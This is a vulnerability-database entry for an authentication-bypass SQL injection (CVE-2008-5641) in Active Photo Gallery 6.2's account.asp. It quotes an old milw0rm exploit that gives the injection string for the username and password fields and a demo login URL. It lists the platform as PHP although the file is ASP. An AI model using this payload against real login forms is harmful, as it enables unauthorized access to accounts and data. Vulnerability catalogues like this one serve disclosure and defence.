https://www.exploit-db.com/exploits/7299
https://cxsecurity.com/issue/WLB-2008120160
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-333
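Active Photo Gallery 'account.asp' SQL Injection Vulnerability

Vulnerability ID | 1116887 | Vulnerability type | SQL injection |
Published | 2008-11-30 | Updated | 2009-01-29 |
CVE ID | CVE-2008-5641 | CNNVD ID | CNNVD-200812-333 |
Platform | PHP | CVSS score | 7.5 |
|Vulnerability source
|Vulnerability details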
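Active Photo Gallery is a web-based photo album management and search software system. A SQL injection vulnerability exists in account.asp in Active Photo Gallery version 6.2. A remote attacker can execute arbitrary SQL commands via the (1) username and (2) password parameters.
|Exploit
[~] ----------------------------In the name of God, the Most Gracious, the Most Merciful------------------------------
[~]Type:(Auth Bypass) Remote SQL Injection Vulnerability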
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Photo Gallery v 6.2
[~]author: ((Ñ3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactivephotogallery/account.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] special thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-30]
|References
Source: MILW0RM
Name: 7299
Link: http://www.milw0rm.com/exploits/7299
Source: VUPEN
Name: ADV-2008-3297
Link: http://www.frsirt.com/english/advisories/2008/3297
Source: SREASON
Name: 4767
Link: http://securityreason.com/securityalert/4767
Source: SECUNIA
Name: 32901
Link: http://secunia.com/advisories/32901